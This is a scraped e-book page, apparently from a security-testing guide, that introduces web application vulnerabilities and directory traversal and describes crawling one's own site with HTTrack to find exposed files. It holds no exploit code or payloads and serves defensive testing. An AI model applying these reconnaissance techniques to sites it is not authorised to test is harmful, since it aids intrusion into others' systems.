19.04.2013 Views

2KKUU7ita

2KKUU7ita

2KKUU7ita

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

280<br />

Part V: Hacking Applications<br />

Seeking Web Vulnerabilities<br />

Attacks against unsecured websites and applications via Hypertext Transfer<br />

Protocol (HTTP) make up the majority of all Internet-related attacks. Most<br />

of these attacks can be carried out even if the HTTP traffic is encrypted<br />

(via HTTPS or via HTTP over SSL) because the communications medium<br />

has nothing to do with these attacks. The security vulnerabilities actually<br />

lie within the websites and applications themselves or the web server and<br />

browser software that the systems run on and communicate with.<br />

Many attacks against websites and applications are just minor nuisances and<br />

might not affect sensitive information or system availability. However, some<br />

attacks can wreak havoc on your systems, putting sensitive information at<br />

risk and even placing your organization out of compliance with state, federal,<br />

and international information privacy and security laws and regulations.<br />

Directory traversal<br />

I start you out with a simple directory traversal attack. Directory traversal is a<br />

really basic weakness, but it can turn up interesting — sometimes sensitive —<br />

information about a web system. This attack involves browsing a site and<br />

looking for clues about the server’s directory structure and sensitive files<br />

that might have been loaded intentionally or unintentionally.<br />

Perform the following tests to determine information about your website’s<br />

directory structure.<br />

Crawlers<br />

A spider program, such as the free HTTrack Website Copier, can crawl your<br />

site to look for every publicly accessible file. To use HTTrack, simply load it,<br />

give your project a name, tell HTTrack which website(s) to mirror, and after<br />

a few minutes, possibly hours (depending on the size and complexity of the<br />

site), you’ll have everything that’s publicly accessible on the site stored on<br />

your local drive in c:\My Web Sites. Figure 14-1 shows the crawl output of<br />

a basic website.<br />

Complicated sites often reveal more information that should not be there,<br />

including old data files and even application scripts and source code.

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!